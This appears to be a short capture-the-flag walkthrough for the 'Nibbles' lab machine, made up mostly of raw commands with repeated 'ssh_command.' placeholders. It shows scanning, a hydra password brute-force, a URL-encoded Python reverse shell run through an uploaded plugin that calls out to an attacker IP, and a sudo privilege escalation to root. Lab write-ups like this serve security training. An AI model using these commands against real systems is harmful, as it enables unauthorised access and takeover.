Nibbles

Nibbles


ProvingGrounds Windows

echo “10.129.87.224 nibbles.htb” | sudo tee -a /etc/hosts

nmap -A -p- -oA output 10.129.87.224 —min-rate=10000 —script=vuln —script-timeout=15 -v nmap -T4 -oA output 10.129.87.224 —script=vuln -v nmap -sT -sV -sC -Pn -p- 10.129.87.224

ssh_command.

ssh_command.

gobuster dir -u http://10.129.87.224/nibbleblog/ -w /usr/share/SecLists/Discovery/Web-Content/Common-PHP-Filenames.txt -t 20

ssh_command.

nikto -h 10.129.87.224:80

ssh_command.

ssh_command.

hydra -l admin -P /usr/share/wordlist/rockyou.txt -vV -f -t 2 10.129.87.224 http-post-form “/nibbleblog/admin.php:username=^USER^&password=^PASS^:login_error”

ssh_command.

https://curesec.com/blog/article/blog/NibbleBlog-403-Code-Execution-47.html

/usr/share/laudanum/wordpress/templates/php-reverse-shell.php

ssh_command.

ssh_command.

http://10.129.87.224/nibbleblog/content/private/plugins/my_image/image.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.%20SOCK_STREAM);s.connect((%2210.10.14.164%22,5555));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27

rlwrap nc -lvnp 5555 http://10.129.87.224/nibbleblog/content/private/plugins/my_image/image.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.%20SOCK_STREAM);s.connect((%2210.10.14.164%22,5555));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27

rlwrap nc -lvnp 5555

ssh_command.

ssh_command.

nibbler@Nibbles:/$ cd /home/nibbler nibbler@Nibbles:/home/nibbler$ mkdir -p personal/stuff nibbler@Nibbles:/home/nibbler$ echo “/bin/bash” > personal/stuff/monitor.sh nibbler@Nibbles:/home/nibbler$ chmod a=rwx personal/stuff/monitor.sh nibbler@Nibbles:/home/nibbler$ sudo /home/nibbler/personal/stuff/monitor.sh root@Nibbles:/home/nibbler# whoami

ssh_command.

© 2025 Cu3rv0x